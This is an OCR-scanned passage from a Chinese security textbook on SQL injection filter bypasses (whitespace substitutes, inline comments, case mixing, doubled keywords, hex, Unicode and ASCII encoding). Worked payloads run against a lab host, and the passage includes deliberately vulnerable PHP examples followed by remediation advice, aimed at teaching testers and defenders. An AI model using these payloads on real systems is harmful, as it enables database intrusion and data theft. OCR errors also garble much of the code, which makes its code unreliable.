+---+---+------ + 
输入 以 下 测试 语句 : 


http://ip/index.php? id-1/**/and/**/1-2/**/union/**/select/**/1,2,database() 


通过 /xx*/ 绕 过 了 空格 的 过 滤 , 输 出 数据 库 的 信息 ,如 图 2-107 所 示 。 


d) Load URL 
Ë Split URL 


Execute 


http://192.168.91.142/sqli/07.php?id- 1/**/and/"*/122/** /union/**/select/**/1,2 database() 


C Enable Post data [] Enable Referrer 


Home 


空格 过 滤 


index php?id-1 


id name age 


1 2 ctfswiki 


© CTFS-WIKI 


图 2-107 /xx/ 绕 过 


3. 制 表 符 绕 过 
在 MySQL 数据 库 中 ,可 以 用 制 表 符 来 代替 空格 ,将 空格 用 制 表 符 代替 后 ,SQL 语句 就 可 
以 正常 运行 。 制 表 符 是 不 可 见 字符 ,在 URL 传输 中 需要 编码 ,其 URL 编码 为 %09。 例 如 : 


mysql>select  1,2,database(); 
1112 1database() | 
4---4---4------ 十 
| 1 p2 P cetfswiki l 
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输入 以 下 测试 语句 : 
http://ip/index.php? id-1$09and£$091-2$ 09union$ 09select£091,2,database() 


通过 %09 绕 过 了 空格 的 过 滤 ,输出 数据 库 的 信息 ,如 图 2-108 所 示 。 


gi] Load URL |http://192.168.91.142/sqli/07.php?id=19%609and%091=29%09union%09select%091,2 database) 
X Split URL 
») Execute 
[O Enable Post data [] Enable Referrer 
Home 
空格 过 滤 
lindex php?id-1 
id name age 
1 2 ctfswiki 
© CTFS-WIKI 


图 2-108 Tab 键 绕 过 


4. 换行 符 绕 过 
MySQL 数据 库 支 持 换行 执行 SQL 语句 ,可 以 利用 换行 符 代替 空格 ,换行 符 也 是 不 


可 见 字符 ,在 URL 传输 中 需要 进行 编码 ,其 URL 编码 为 %0a。 例 如 : 


mysql>select 
->1,2,database (); 
1112 1database() | 
+---+---+------ + 
1112] ctfswiki I 


输入 以 下 测试 语句 : 


http://192.168.91.142/sq1i/07.php? id-1$ 0aand$0a1-2$0aunion$0aselect£0al, 
2,database() 


通过 %0a 绕 过 了 空格 的 过 滤 , 输 出 数据 库 的 信息 ,如 图 2-109 所 示 。 


5. 括号 绕 过 
在 MySQL 数据 库 中 ,任何 查询 中 都 可 以 使 用 括号 嵌 套 SQL 语句 ,可 以 利用 括号 绕 


过 空格 的 过 滤 。 
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4 “Load URL [http://192.168.91.142/sqli/07.php?id=1%0aand%0a1=2%0aunion%0aselect%0a1,2,database() 
A split URL 
+) Execute 


LI] Enable Post data [] Enable Referrer 


空格 过 渡 


index php?id=1 


id name age 


1 2 ctfswiki 


© CTFS-WIKI 


图 2-109 ”换行 符 绕 过 


mysql>select (username) from(user)where (username)- ('userl'); 


+-------- + 
| username | 
+-------- + 
| user1 l 
+-------- + 


1 row in set 


MySQL 数据 库 有 一 个 特性 。 在 条 件 语句 中 ,在 where id=1 后 面 加 “一 1”, 成 为 
where id 一 1 二 1, 就 是 对 前 面 的 所 有 结果 与 1 ,查询 的 结果 与 原来 一 样 。 例 如 ,执行 select 
* from user where id— 1— 1 和 select * from user where id— 1 的 结果 一 样 ,都 是 1、 


userl,passl, 


mysql»select * from user where id-1-1; 
+----+------ +------- + 
| id | username | password| 
+----+------ +------- + 
| 1 |userl | pass1 l 


TE where id=1 后 面 加 “二 0”, 成 为 where id 一 1 王 0, 就 是 对 前 面 的 所 有 结果 与 0( 取 
BO ,查询 的 结果 为 除去 原 有 查询 结果 的 其 他 数据 。 例 如 ,执行 select * from user where 
id—1-0 的 结果 是 对 select * from user where id — 1 的 结果 取 反 ,输出 的 是 除去 1、 
userl,passl 以 外 的 其 他 信息 , 即 2、user2、pass2 等 。 


mysql>select * from user where id-1-0; 
+---+------- +-------- + 
| id | username | password | 
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+---+------- +-------- + 
| 2 luser2 | pass2 I 
| 3 luser3 | pass3 I 
| 4 luser4 | pass4 I 
| 5 luser5 | pass5 I 
| 6 luser6 | pass6 1 
| 7 | user7 | pass7 1 
| 8 | user8 | pass8 I 
+---+------- + 一 一 一 一 一 一 一 一 + 


7 rows in set 


利用 MySQL 的 上 述 特性 ,构造 括号 绕 过 payload, 就 可 以 进行 bool 注入 ,获得 数据 
库 的 信息 。 
输入 以 下 测试 语句 : 


http://192.168.91.142/sq1i/07.php? id-1- (ascii (mid (database () from (1) for 
(1)))799) 


输出 的 用 户 信 息 是 userl, 根 据 上 面 的 讨论 ,可 以 判断 “id 三 1 三 ”后面 的 (ascii(Cmid 
(database()from(1)for(1))) 二 99) 的 结果 为 1, 数 据 库 名 的 第 一 个 字符 的 ASCII 码 应 该 
是 99, 也 就 是 字母 c, 如 图 2-110 所 示 。 


wj Load URL [http;//192.168.91.142/sqli/07.php?id- 1 (ascii(mid(databaseUfrom(1)for(1))) -99) 


网 ”Split URL 


月 Execute 


口 Enable Post data [ ] Enable Referrer 


空格 过 渡 


index php?id-1 


id name age 


1 usert passi 


© CTFS-WIKI 


图 2-110 asciiCmid( databaseO from (1) for(1))) — 99 的 返回 结果 
输入 以 下 测试 语句 : 


http://192.168.91.142/sqli/07.php?id=1= (ascii (mid (database () from (1) for 
(1)))=100) 


输出 的 用 户 信息 是 user2, 根 据 上 面 的 讨论 ,可 以 判断 “id 二 1 二 ”后 面 的 (ascii(mid 
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(Cdatabase()from(1)for(1))) 王 100) 的 结果 为 0, 数据 库 的 第 一 个 字符 的 ASCI 码 应 该 不 
是 100, 即 不 是 字母 d, 如 图 2-111 所 示 。 


@ Load URL [http//192.168.91.142/sqli/07.php?id 1 (ascii(mid(databaseQfrom(1)for(1)) 2100) 


A -Split URL 


+) Execute 


口 Enable Post data [] Enable Referrer 


空格 过 滤 


index php?id-1 
id name age 
2 user2 pass2 
© CTFS-WIKI 


图 2-111 ascii(mid(databaseO from CD forCDD)) —100 的 返回 结果 


6. ` 绕 过 
MySQL 中 的 反 引 号 () 是 为 了 区 分 MySQL 的 保留 字 与 普通 字符 而 引入 的 符号 , 反 
引号 可 以 代替 空格 , 绕 过 空格 过 滤 。 例 如 : 


mysql»select'username'from'user' where `username `= 'userl'; 


+-------- + 
| username | 
+-------- + 
| user1 I 
+-------- + 


1 row in set 


2402 ”内 联 注释 绕 过 


MySQL 会 执行 放 在 /! …/ 中 的 语句 。/! 50010…/ 也 可 以 执行 位 于 其 中 的 SQL 语 
句 ,其 中 ,50010 表示 5. 00. 10 ,为 MySQL 版 本 号 。 当 MySQL 数据 库 的 实际 版 本 号 大 于 
内 联 注释 中 的 版 本 号 时 ,就 会 执行 内 联 注释 中 的 代码 。 可 以 利用 MySQL 的 这 个 特性 绕 
过 特殊 字符 过 滤 。 例 如 : 


mysql»/* !select*/ * /* !from*/ user; 
4---4------- 4------- * 
| id | username | password | 
+ 一 一 一 二- 一 一 一 一 一 一 4------- * 
| 1|userl | passi I 
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当前 MySQL 数据 库 的 版 本 是 5. 1. 73 ,使 用 此 版 本 的 数据 库 进 行 验证 测试 。 


D 当 内 联 注释 中 的 版 本 设置 为 50173 时 ,与 当前 MySQL 数据 库 版 本 相同 ,会 正常 
执行 内 联 注释 中 的 SQL 语句 。 例 如 : 


(2) 当 内 联 注释 中 的 版 本 设置 为 50170 时 ,小 于 当前 MySQL 数据 库 版 本 ,会 正常 执 
行内 联 注释 中 的 SQL 语句 。 例 如 : 


(3) 当 内 联 注释 版 本 设置 为 50174 时 ,大 于 当前 MySQL 数据 库 版 本 ,会 报错 。 
例如 : 


输入 以 下 测试 语句 : 


$23 SQL 注入 漏洞 


通过 内 联 注释 绕 过 了 关键 字 的 过 滤 ,获取 了 表 名 user, 如 图 2-112 所 示 。 


@ LoadURL [http//192.168.91.142/sgli/08.php?id-1 and 1-2 /"lunion"/ /"!Select"/ 1,group concat(table name), /nifrom/ 
Ü spitumL information schema:ables where table schema-'ctíswik 
月 ”Execute 


口 Enable post data Enable Referrer 


lindex php?id-1 


id name age 


1 user 3 


图 2-112 通过 内 联 注释 绕 关键 字 的 过 滤 


2.40.3 大 小 写 绕 过 


根据 应 用 程序 的 过 滤 规 则 ,通常 会 针对 恶意 关键 字 设置 黑 名 单 , 如 果 存 在 恶意 关键 
字 , 应 用 程序 就 会 退出 运行 。 但 是 在 过 滤 规 则 中 可 能 存在 过 滤 不 完整 或 者 只 过 滤 小 写 或 
者 大 写 的 情况 ,没有 针对 大 小 写 组 合 进行 过 滤 ,导致 可 以 通过 大 小 写 混 写 payload 的 方式 
漏洞 示例 代码 如 下 : 


if (preg match('/select/', $ GET["id"])) ( 
die ("ERROR"); 
}else{ 
$id=$_GET['id']; 
$sql-"SELECT * FROM user WHERE id=$id LIMIT 0,1"; 
$result=mysql query ($sq1) ; 
} 


在 以 上 代码 中 ,通过 preg_match 函数 对 GET 型 id 参数 进行 了 过 滤 ,如 果 存 在 select 
关键 字 ,应 用 程序 会 结束 运行 ,并 且 输 出 ERROR。 但 是 preg match 函数 并 没有 对 select 
大 小 写 的 各 种 情况 进行 判断 ,导致 攻击 者 可 以 通过 大 小 写 混 写 select 关键 字 的 方式 来 绕 

输入 以 下 测试 语句 : 


http://192.168.91.142/sq1i/08.php? id-1 and 1-2 union select 1,2,database () 
应 用 程序 可 以 过 滤 select 关键 字 , 输 入 的 SQL 注入 语句 存在 select 关键 字 , 匹 配 preg_ 


match 函数 的 过 滤 规 则 ,会 输出 ERROR ,如 图 2-113 所 示 。 
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六 Load URL 
Ñ SpltuR. 
D 


http://192.168.91.142/sgli/08.php?id- 1 and 1-2 union select 1,2 database 
Execute 


Enable Post data 


DJ Enable Referrer 


大 小 写 绕 过 


index php?id-1 


ERROR 


2-113 输出 ERROR 
输入 以 下 测试 语句 : 


http://192.168.91.142/sq1i/08.php? id-1 and 1=2 union seLeCt 1,2,database() 
图 2-114 所 示 。 


@ Load URL 
Ñ soltuRL 
D Execute 


通过 大 小 写 混 写 (seLeCt) 绕 过 了 select 关键 字 过 滤 , 获 取 了 数据 库 名 信息 ctfswiki, 如 


http;//192.168.91.142/sgJi/08.php?idz 1 and 1=2 union seLeCt 1,2 database() 


C Enable Post data [] Enable Referrer 


大 小 写 绕 过 


lindex php?id-1 


name 


age 
OCTFS-WIK 


ctfswiki 


图 2-114 大 小 写 混 写 绕 过 了 select 关键 字 过 滤 
2404 双 写 关键 字 绕 过 
漏洞 示例 代码 如 下 : 


if(isset($ GET['id']))( 
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$id=preg_replace('/select/i',"'", $ GET["id"]); 
$sql-"SELECT * FROM user WHERE id=$id LIMIT 0,1"; 
$result-mysql query ($sql); 


在 上 面 的 代码 中 ,利用 preg_replace Kx} GET 型 id 参数 进行 了 过 滤 ,如 果 存 在 
select 关键 字 ,会 将 select 关键 字 蔡 换 为 空 ,并 且 继续 执行 。 但 是 preg_replace 函数 并 没 
有 进行 多 次 判断 ,导致 可 以 通过 双 写 关键 字 的 方式 绕 过 过 滤 。 

输入 以 下 测试 语句 : 


http://192.168.91.142/sq1i/09.php? id-1 and 1-2 union select 1,2,database() 


会 出 现 报 错 ,因为 select 被 替换 为 空 ,导致 SQL 语法 错误 ,如 图 2-115 所 示 。 


Load URL 
A Split URL 


3) Execute 


http;//192.168.91.142/sali/09.php?id-1 and 1-2 union select 1,2.database() 


口 Enable Post data [ ] Enable Referrer 


双 写 关键 字 绕 过 


index php?id-1 


You have an error in your SQL syntax, check the manual that corresponds to your MySQL server version for the 
right syntax to use near '1.2.database() LIMIT 0.1' at line 1 
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图 2-115 select 被 替换 为 空 
输入 以 下 测试 语句 : 


http://192.168. 91.142/sqli/09.php? id=1 and 1=2 union seselectlect 1,2, 
database () 


查询 到 了 数据 库 中 的 信息 ,因为 seselectlect 关键 字 在 preg_replace 函数 中 过 滤 时 ,其 中 
的 select 字符 串 被 替换 为 空 ,剩余 的 字符 串 是 select, 绕 过 了 过 滤 规 则 ,如 图 2-116 所 示 。 


2.10.5 ”编码 绕 过 


1. 漏洞 示例 代码 

漏洞 示例 代码 如 下 : 

if (preg match('/select/i', $ GET["id"])) ( 
die ("ERROR"); 


}else{ 
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$id=$ GET['id']; 
$sql="SELECT * FROM user WHERE id=$id LIMIT 0,1"; 


$result=mysql query($sql); 


Load URL | httpy/192.168.91.142/sqli/09.php?id=1 and 1=2 union seselectlect 1.2.database0 


Split URL 


G se g 


Execute 


L] Enable Post data [ ] Enable Referrer 


双 写 关键 字 绕 过 


lindex php?id-1 


id name age 


ctfswiki 


K 2-116 利用 seselectlect 绕 过 关键 字 过 滤 
在 以 上 代码 中 ,通过 preg_match 函数 对 GET 型 id 参数 进行 了 过 滤 ,并 且 对 大 小 写 
的 情况 进行 了 判断 ,如 果 存 在 select 关键 词 ,应 用 程序 会 结束 运行 ,并 且 输 出 ERROR, 
对 于 这 种 过 滤 , 只 能 通过 关键 字 变 换 的 方式 来 绕 过 。 
2. 双重 URL 编码 绕 过 
输入 以 下 测试 语句 : 


http://192.168.91.142/sqli/10.php? id=1 and 1=2 union select 1,2,database() 


应 用 程序 过 滤 了 select, 输 入 的 语句 存在 select 关键 字 , 输 出 ERROR ,如 图 2-117 所 示 。 
输入 以 下 测试 语句 : 


http://192.168.91.142/sqli/10.php?id=1 and 1-2 union se$256cect 1,2,database() 


通过 将 select 进行 双重 编码 绕 过 了 select 关键 字 过 滤 ,获取 了 数据 库 的 信息 ctfswiki, 如 
图 2-118 所 示 o 


3. 十 六 进 制 编码 绕 过 
MySQL 数据 库 可 以 识别 十 六 进 制 , 会 对 十 六 进 制 的 数据 进行 自动 转换 。 如 果 PHP 


配置 中 开启 了 GPC.GPC 会 自动 对 单 引号 进行 转 义 ,这 样 注入 就 无 法 正常 使 用 。 但 是 ,如 
果 将 注入 的 数据 转换 为 十 六 进 制 ,就 不 需要 单 引 号 ,可 以 正常 注入 。 
原来 的 注入 语句 为 
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http://192.168.91.142/sqli/10.php?id=1 and 1-2 union select 1,2,database() 


Enable Post data [] Enable Referrer 


双重 url 编 码 绕 过 


/index php?id=1 


ERROR 


图 2-117 应 用 过 滤 了 select 关键 字 


[http://192.168.91.142/sqli/10.php?id=1 and 1=2 union se%256cect 1.2.database0 


[O Enable Post data 口 Enable Referrer 


双重 url 编 码 绕 过 


index php?id-1 


id name age 


1 2 ctfswiki 
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图 2-118 双重 编码 绕 过 了 select 关键 字 过 滤 


http://ip/index.php? id-1 and 1=2 union select l,group concat (table name),3 
from information schema.tables where table schema- 'ctfswiki' 


但 是 经 GPC 转 义 后 ,SQL 语法 就 会 发 生 错 误 ,不 能 正常 注入 。 


select 1,group_concat (table name),3 from information schema.tables where 


table schema - V'ctfswikiV' 


输入 以 下 测试 语句 : 


http://ip/index.php? id=1 and 1-2 union select l,group concat (table name),3 
from information schema.tables where table schema-0x6374667377696b69 
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将 ctfswiki 转换 为 十 六 进 制 0x6374667377696b69 ,可 以 正常 注入 ,获得 数据 ,如 图 2-119 
所 示 。 
Load URL 


Split URL 
Execute. 


http.//192.168.91.142/sgli/01.php?id-1 and 1-2 union select 1,group concat(table name),3 from information schema.tables where 
table schemaz0x6374667377696b69 


L] Enable Post data [ ] Enable Referrer 


MYSQL UNION SQLI 


lindex php?id-1 


id name age 


1 ctfswiki user users 3 
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图 2-119 十 六 进 制 编码 绕 过 了 单 引号 过 滤 


4. Unicode 编码 绕 过 

IIS 中 间 件 可 以 识别 Unicode 字符 , 当 URL 中 存在 Unicode 字符 时 ,IIS 中 间 件 会 自 
动 对 Unicode 字符 进行 转换 。 

输入 以 下 测试 语句 : 


http://192.168.91.142/sqli/index.asp? id- 1 and 0< (se$ u006cect top 1 name 
from sec.dbo.sysobjects where xtype-'U') 


通过 将 select 关键 词 进行 Unicode 编码 绕 过 了 select 关键 字 过 滤 ,获取 了 表 名 的 信息 ,如 
图 2-120 所 示 。 


WE) LoadURL |http://192.168.91.142/sqli/index.asp?id=1 and 0<(se%u006cect top 1 name from sec.dbo.sysobjects where xtype='U') 
Ñ SpltURL 
©) Execute 


Enable Post data Enable Referrer 


Microsoft OLE DB Provider for SQL Server ìk '80040e07' 


É nvarchar f [eins CasePro' Jetta int 时 失败 。 


图 2-120 Unicode 编码 绕 过 了 select 关键 字 过 滤 


5. ASCII 编码 绕 过 


SQL Server 数据 库 的 char 函数 可 以 将 字符 转换 为 ASCI 码 ,这 样 也 可 以 绕 过 单 引 
号 转 义 的 情况 。 
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原来 的 注入 语句 为 


http://ip/index.asp?id=1 and 0< (select top 1 name from sec.dbo.sysobjects 
where xtype- 'U' and name not in ('eims CasePro')) 


将 eims CasePro 进行 ASCII 编码 得 到 


CHAR(101) +CHAR (105) +CHAR (109) +CHAR (115) +CHAR (95) +CHAR (67) +CHAR (97) + 
CHAR (115) +CHAR (101) +CHAR (80) +CHAR (114) +CHAR (111) 


加 号 的 URL 编码 为 %2b, 最 终 的 payload # F : 


http://ip/index.asp?id-1 and 0< (select top 1 name from sec.dbo.sysobjects 
where xtype-'U' and name not in (CHAR (101) $ 2bCHAR (105) $ 2bCHAR (109) $ 2DCHAR 
(115)$ 2bCHAR (95) $ 2bCHAR (67) $ 2bCHAR (97) $ 2bCHAR (115) $ 2bCHAR (101) $ 2bCHAR 
(80) $2bCHAR (114) $2bCHAR (111) )) 


通过 对 表 名 进行 ASCI 编码 绕 过 了 单 引 号 转 义 的 情况 ,获取 了 其 他 表 名 的 信息 ,如 
图 2-121 所 示 。 


局 LoadURL [http;//192.168.91.142/sqli/index.asp?id-1 and 0<(select top 1 name from sec.dbo.sysobjects where xtype='U' and name not in ( 
Ü spitumL |CHAR(101)%2bCHAR(105)%2bÞCHAR(109)%2bCHAR(115)%2bCHAR(95)%2bCHAR(67)%2bCHAR(97)%2bÞCHAR(115)%2bCHAR(101) 


(9) Execute 


962b CHAR(BO)962bCHAR(114)962bCHAR(111))) 


C Enable Post data [DD Enable Referrer 


Microsoft OLE DB Provider for SQL Server filiR '80040e07' 


在 将 nvarchar 全 eins Canesort | etta int 时 失败 。 
图 2-121 ASCI 编码 绕 过 了 单 引 号 转 义 


2.10.6 等 价 函 数字 符 替 换 绕 过 


1. 用 like sk in 代替 = 
在 MySQL 数据 库 中 ,可 以 用 like 或 者 in 代替 一 进 行 查询 ,可 以 利用 此 特性 绕 过 对 
一 的 过 滤 。 例 如 : 


mysql»select * from user where username- 'userl'; 


T---4------- *------- * 
| id | username | password | 
+---+------- +------- + 
| 1 | userl | pass1 1 
+---+------- +------- + 


1 row in set 

mysql>select * from user where username like 'userl'; 
*---4------- 4------- * 

| id | username | password | 

*x---4------- 4------- * 
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1 row in set 

mysql>select * from user where username in('userl'); 
4---4------- 4------- * 

| id | username | password | 

*4---4------- 4------- * 

| 1 useri | passi I 

+---+------- + 一 一 一 一 一 一 一 + 

1 row in set 


2. 漏洞 示例 代码 
漏洞 示例 代码 如 下 : 


if (preg match('/=/"', $ GET["id"])) ( 
die ("ERROR"); 
Jelse( 
$id=$ GET['id']; 
$sql-"SELECT * FROM user WHERE id-$id LIMIT 0,1"; 
$result=mysql query($sq1l); 


在 以 上 代码 中 ,通过 preg match 函数 对 GET 型 id 参数 进行 了 过 滤 ,如 果 存 在 = 字 
符 ,应 用 程序 会 结束 运行 ,并 且 输出 ERROR ,= 可 以 用 like 或 者 in 来 代替 ,以 绕 过 对 一 的 
输入 以 下 测试 语句 : 


http://192.168.91.142/sq1i/12.php? id-1 and 1-1 


提示 error, 因 为 URL 中 存在 一 ,匹配 过 滤 规 则 ,如 图 2-122 所 示 。 


Àj Load URL [http://192.168.91.142/sqli/12.php?id=1 and 1=1 
Ë Split URL 


» Execute 


L] Enable Post data [ ] Enable Referrer 


等 价 函 数 蔡 换 过 滤 


/index php?id=1 


ERROR 


Æ 2-122 URL 中 存在 = 
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输入 以 下 测试 语句 : 
http://192.168.91.142/sq1i/12.php? id-1 and 1 like 1 


将 三 用 like 替换 ,可 绕 过 对 二 的 过 滤 , 如 图 2-123 所 示 。 


4E toad URL [http//192.168.91.142/sqli/12.php?id=1 and 1 like 1 
Ë Split URL 


Execute 


口 Enable Post data [7] Enable Referrer 


等 价 函 数 蔡 换 过 渡 


Index php?id-1 


id name age 


1 user passi 
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Ed 2-123 利用 like 绕 过 对 一 的 过 滤 


3. 逗号 过 滤 
可 以 用 以 下 方法 绕 过 逗号 过 滤 : 


mysql»select substr (database(),1,1); 


1 row in set 
mysql»select substr (database () from 1 for 1); 


+------------------------- 十 
| substr(database() from 1 for 1) | 
+------------------------- 
lc I 
+--------- + 


1 row in set 


4. 等 价 函 数 

可 以 用 以 下 等 价 函 数 代替 来 绕 过 过 滤 : 

* sleep 函数 可 以 用 benchmark 函数 代替 。 
。 ascii 函数 可 以 用 hex bin 函数 代替 。 
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* group concat Pñ kn] LJH concat ws 函数 代替 。 
* updatexml 函数 可 以 用 extractvalue 函数 代替 。 


211. MySQL 注入 漏洞 修复 


2.11.1 代码 层 修复 


1. 数字 型 注入 漏洞 修复 

对 于 数字 型 注入 漏洞 ,可 以 用 intval 函数 进行 强制 数据 转换 来 修复 。 
1) intval 函数 详解 

intval 函数 格式 如 下 : 


int intval (mixed $var [, int $ base-10]) 


该 函数 通过 使 用 指定 的 进 制 转换 (默认 是 十 进 制 , 即 base— 10) ,返回 变量 的 整数 值 。 
如 果 base 是 0, 通 过 检测 变量 的 格式 来 决定 使 用 的 进 制 。 如 果 字 符 串 以 0x( 或 0X) 


开始 ,使 用 十 六 进 制 (hex) ;如 果 字 符 串 以 0 开始 ,使 用 八进制 (octal) ;对 于 其 他 情况 ,使 
用 十 进 制 (decimal)。 


2) 数字 型 注入 漏洞 修复 示例 

漏洞 修复 前 示例 代码 如 下 : 

$id-$ GET['id']; 

$Sql- "SELECT * FROM users WHERE id-$id LIMIT 0,1"; 


$result-mysql query($sql); 
$row-mysql fetch array ($result); 


此 代码 的 $id 参数 处 存在 数字 型 注入 漏洞 , $ id 参数 可 控 并 且 没 有 经 过 任何 过 滤 就 


与 SQL 语句 进行 了 拼接 。 


漏洞 修复 后 示例 代码 如 下 : 


$id-$ GET['id']; 

$id-intval ($id); 

$sql-"SELECT * FROM users WHERE id-$id LIMIT 0,1"; 
$result-mysql query ($sql); 
$row-mysql fetch array($result); 


修复 后 的 代码 主要 在 $id 参数 处 加 入 了 intval 函数 ,通过 该 函数 对 传人 字符 进行 强 


制 转换 ,以 避免 出 现 数字 型 注入 漏洞 。 


2. 字符 型 注入 漏洞 修复 
字符 型 注入 漏洞 可 以 用 htmlspecialchars PR, MySQL. real escape string 函数 和 


addslashes 函数 进行 特殊 字符 转换 来 修复 。 
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1) htmlspecialchars 函数 详解 

htmlspecialchars 函数 把 预定 义 字 符 转 换 为 HTML 实体 。 

预定 义 字符 的 转换 是 : &( 和 号 ) 转 换 为 &amp;"( 双 引号 ) 转 换 为 S quot; ( 单 引号 ) 
转换 为 & #039; 二 (小 于 号 ) 转 换 为 &lt; 二 (大 于 号 ) 转 换 为 E gt. 

注意 : htmlspecialchars 函数 默认 不 对 单 引 号 进行 转换 。 需 要 加 上 ENT QUOTES 
参数 才 会 对 单 引 号 进行 转换 。 

2) mysql real escape string 函数 详解 

mysql real escape string 函数 对 SQL 语句 中 使 用 的 字符 串 中 的 特殊 字符 进行 
转 义 。 

TRE X57 EIE N00 Nn Nr NS" Axla. 

如 果 成 功 , 则 该 函数 返回 被 转 义 的 字符 串 ; 如 果 失 败 , 则 返回 false. 

mysql real escape string 函数 必须 在 4. 3. 0 及 以 上 版 本 的 PHP 4 和 PHP 5 中 才能 
使 用 。 在 PHP 5. 3 中 已 经 弃 用 了 这 种 方法 ,不 推荐 使 用 。 

3) addslashes 函数 详解 

addslashes 函数 返回 在 预定 义 字 符 之 前 添加 反 斜 线 的 字符 串 。 

预定 义 字 符 是 单 引 号 ()、 双 引号 (")\ 反 斜 线 (\) null, 

4) 字符 型 注入 漏洞 修复 示例 

漏洞 修复 前 示例 代码 如 下 : 


$id=$ GET['id']; 

$sql-"SELECT * FROM users WHERE id-'$id' LIMIT 0,1"; 
$result-mysql query ($sql); 

$row-mysql fetch array($result); 


此 代码 的 $id 处 存在 字符 型 注入 漏洞 , $ id 可 控 并 且 没 有 经 过 任何 过 滤 就 与 SQL 语 
句 进行 了 拼接 。 
漏洞 修复 后 示例 代码 如 下 : 


$id-$ GET['id']; 

$id -htmlspecialchars (addslashes ($id)); 
$sql-"SELECT * FROM users WHERE id-$id LIMIT 0,1"; 
$result-mysql query ($sql); 
$row-mysql fetch array($result); 


修复 后 的 代码 主要 在 $ id 处 加 入 了 htmlspecialchars 函数 ,通过 该 函数 对 传人 的 单 
引号 等 字符 串 进行 转 义 ,以 避免 出 现 字 符 型 注入 漏洞 。 


3. 参数 化 查询 防止 注入 
mysqli 和 pdo 这 两 个 新 扩展 都 支持 参数 化 查询 。pdo 与 mysqli 的 区 别 是 ,pdo 并 不 
局 限于 MySQL 数据 库 ,可 以 从 MySQL 切换 到 PostgreSQL. 而 mysqli 仅 支持 MySQL 
数据 库 。 
mysqli 参数 化 查询 示例 代码 如 下 : 
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$mysqli-new mysqli ("localhost", "dbusername", "dbpassword", "database"); 
$username- "somename"; 
Spassword- "someword"; 
S$query= "SELECT filename, filesize FROM users WHERE (name =? ) and (password 72)"; 
$stmt-$mysqli-»stmt init(); 
if ($stmt-»prepare ($query)) ( 

$stmt-»bind param("ss", $username, $password); 
$stmt-»execute(); 
$stmt-»bind result ($filename, $filesize); 

while(S$stmt-»fetch()) ( 

printf("$s : %d\n", $filename, $filesize); 

) 

$stmt-»close(); 
) 
$mysqli-»close(); 


PDO 参数 化 查询 示例 代码 如 下 : 


$pdo-new PDO ("mysql:host-localhost;dbname-database", "dbusername", 
"dbpassword"); 
$username- "somename"; 
$password- "someword"; 
$query- "SELECT * FROM users WHERE (name = : username) and (password- : 
password)"; 
$statement- $pdo - > prepare ($query, array (PDO::ATTR CURSOR- > PDO::CURSOR _ 
FWDONLY)); 
$statement-»bindParam(":username", $username, PDO::PARAM STR, 10); 
$statement-»bindParam(":password", $password, PDO::PARAM STR, 12); 
$statement-»execute(); 
while ($row-$statement-»fetch(PDO::FETCH ASSOC)) ( 

printf("$s : $d\n", $row["filename"], $row["filesize"]); 
) 
$statement-»closeCursor(); 
$pdo-null; 


2412 服务 器 配置 修复 
可 以 通过 修改 服务 器 的 PHP 配置 来 修复 MySQL 注入 漏洞 。 


1. 修改 magic_quotes_gpc 配置 
当 magic_quotes_gpc 为 on 时 ,所 有 的 '( 单 引号 )、( 双 引号 ) \( 反 和 斜 线 ) 和 null 被 加 


上 一 个 反 斜 线 自动 转 义 。 该 设置 将 自动 影响 $_GET、$_POST、$_COOKIE 数组 的 值 ， 
在 PHP 4 rp, $ ENV 也 会 被 转 义 。 
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注意 : 本 特性 已 自 PHP 5.3.0 起 废弃 并 自 PHP 5. 4.0 起 被 移 除 。 


2. 修改 magic_quotes_sybase 配置 
magic quotes sybase 会 将 单 引号 ('), 转 义 为 两 个 单 引号 (")。 但 是 只 将 magic_ 
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quotes sybase 设置 为 on 并 不 生效 ,需要 将 magic quotes gpc 也 设置 为 on. magic quotes 
.sybase 才 会 生效 。 


242 思考 题 


. SQL 注入 的 原理 是 什么 ? 

. SQL 注 人 有 哪 几 种 分 类 ? 

. 如 何 判 断 是 否 存 在 SQL 注入 漏洞 ? 

. SQL 注入 中 联合 查询 注入 的 原理 是 什么 ? 

. SQL 注入 中 bool 注入 的 原理 是 什么 ? 

. SQL 注入 中 sleep 注入 的 原理 是 什么 ? 

SQL 注入 中 floor 注入 的 原理 是 什么 ? 

. SQL 注入 中 updatexml 注入 的 原理 是 什么 ? 

. SQL 注入 中 宽 字 节 注 和 的 原理 是 什么 ? 

10. MySQL 数据 库 中 的 information schema 库 中 有 哪些 重要 的 表 ? 分 别 代表 什么 ? 
11. Oracle 数据 库 中 有 哪些 重要 的 数据 字典 视图 ?分别 代表 什么 ? 
12. 常见 的 SQL 注入 绕 过 方式 有 哪些 ? 

13. SQL 注入 的 修复 方式 有 哪些 ? 


c o -30 mn & ç to- 
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文件 上 传 漏洞 


3.1 文件 上 传 漏洞 简介 


文件 上 传 漏洞 出 现在 有 上 传 功能 的 应 用 程序 中 。 如 果 应 用 程序 对 用 户 的 上 传 文件 没 
有 控制 或 者 上 传 功能 存在 缺陷 ,攻击 者 可 以 利用 应 用 程序 的 文件 上 传 漏洞 将 木马 .病毒 等 
有 危害 的 文件 上 传 到 服务 器 上 面 ,控制 服务 器 。 

文件 上 传 漏洞 产生 的 主要 原因 是 : 应 用 程序 中 存在 上 传 功能 ,但 是 对 上 传 的 文件 没有 
经 过 严格 的 合法 性 检验 或 者 检验 函数 存在 缺陷 ,导致 攻击 者 可 以 上 传 木 马 文件 到 服务 器 。 

文件 上 传 漏洞 危害 极 大 ,这 是 因为 利用 文件 上 传 漏洞 可 以 直接 将 恶意 代码 上 传 到 服 
务 器 上 ,可 能 会 造成 服务 器 的 网 页 被 算 改 、 网 站 被 挂 马 、 服 务 器 被 远程 控制 .被 安装 后 门 等 
严重 的 后 果 。 

攻击 者 对 文件 上 传 漏洞 的 利用 方式 主要 是 通过 前 端 JS 过 滤 绕 过 文件 名 过 滤 绕 过 、 
Content-Type 过 滤 绕 过 等 进行 恶意 代码 上 传 。 


3.2 前 端 JS 过 滤 绕 过 


前 端 JS 过滤 绕 过 的 原理 是 : 应 用 程序 是 在 前 端 通过 JS 代码 进行 验证 ,而 不 是 在 程 
序 后 端 进行 验证 ,这 样 攻击 者 就 可 以 通过 修改 前 端 JS 代码 绕 过 上 传 过 滤 ,上 传 木马 。 


1. 前 端 JS 过 滤 绕 过 示例 代码 分 析 
前 端 JS 过 滤 绕 过 示例 代码 如 下 : 


«?php 
$uploaddir- 'uploads/'; 
if (isset($ POST['submit'])) ( 
if (file exists (S$uploaddir)) ( 
if (move uploaded file($ FILES['upfile']['tmp name'], $uploaddir . 
'/' . $ FILES['upfile'] ['name'])) ( 
